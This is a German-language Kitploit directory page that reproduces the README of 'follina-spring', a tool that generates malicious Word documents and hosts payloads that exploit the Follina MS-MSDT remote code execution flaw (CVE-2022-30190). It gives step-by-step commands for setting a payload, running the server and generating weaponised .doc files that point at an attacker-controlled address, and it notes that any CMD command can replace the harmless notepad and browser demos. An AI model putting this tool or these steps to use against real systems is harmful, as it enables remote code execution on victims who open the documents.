Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
follina-spring — Server zum Hosten/Aktivieren von Follina-Payloads & Generator für schädliche Word-Dokumente, die das MS-MSDT-Protokoll ausnutzen. (CVE-2022-30190) | Kitploit
Tools/GitHubGitHub/dsibilio/follina-spring
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubdsibilio/follina-spring

follina-spring

Server zum Hosten/Aktivieren von Follina-Payloads & Generator für schädliche Word-Dokumente, die das MS-MSDT-Protokoll ausnutzen. (CVE-2022-30190)

Repository anzeigen
42vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Follina MS-MSDT-Ausnutzung mit Spring Boot

Dieses Repository enthält eine einfache Spring Boot-Anwendung, die sowohl als Server zum Hosten/Aktivieren von Follina-Payloads als auch als Generator für bösartige Word-Dokumente dient, die als Angriffsvektoren zur Ausnutzung von CVE-2022-30190 verwendet werden können.

Diese Schwachstelle besteht aus Remote Code Execution über MSDT (Microsoft Windows Support Diagnostic Tool).

Serverseitiger Payload

Um einen eindeutigen Payload Ihrer Wahl bereitzustellen, sollten Sie:

  • den Payload definieren, z. B.:
root@kitploit:~
export FOLLINA_PAYLOAD="notepad.exe"
  • den Server ausführen, um den statischen Payload zu hosten:
root@kitploit:~
mvn spring-boot:run
  • das „Follina“-Word-Dokument generieren:
root@kitploit:~
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc

Wenn Sie den aktuellen Payload ändern möchten, müssen Sie zuerst den derzeit aktiven Server herunterfahren und die Schritte nach dem Definieren des neueren Payloads wiederholen.

HINWEIS: Der Payload kann durch jeden anderen Befehl ersetzt werden, solange er über die Windows-CMD ausgeführt werden kann.

Clientseitiger Payload

Um einen clientseitigen Payload Ihrer Wahl bereitzustellen, sollten Sie:

  • den Server ausführen, um die Payloads zur Laufzeit zu aktivieren:
root@kitploit:~
mvn spring-boot:run
  • das „Follina“-Word-Dokument generieren und dabei den Abfrageparameter cmd angeben, z. B.:
root@kitploit:~
curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc

Der Payload ist in diesem Fall im Dokument eingebettet und muss lediglich durch Kontaktaufnahme mit dem Server aktiviert werden. Auf diese Weise können Sie mehrere verschiedene Payloads auf verschiedene Dokumente verteilen und müssen den Server nicht neu starten, um Payload-Änderungen auszulösen – Sie können einfach ein neues Dokument mit dem gewünschten eingebetteten Payload generieren.

Anerkennung

Vielen Dank an John Hammond für die Python-Implementierung und das Teilen seiner Analyse der CVE.

Tool herunterladen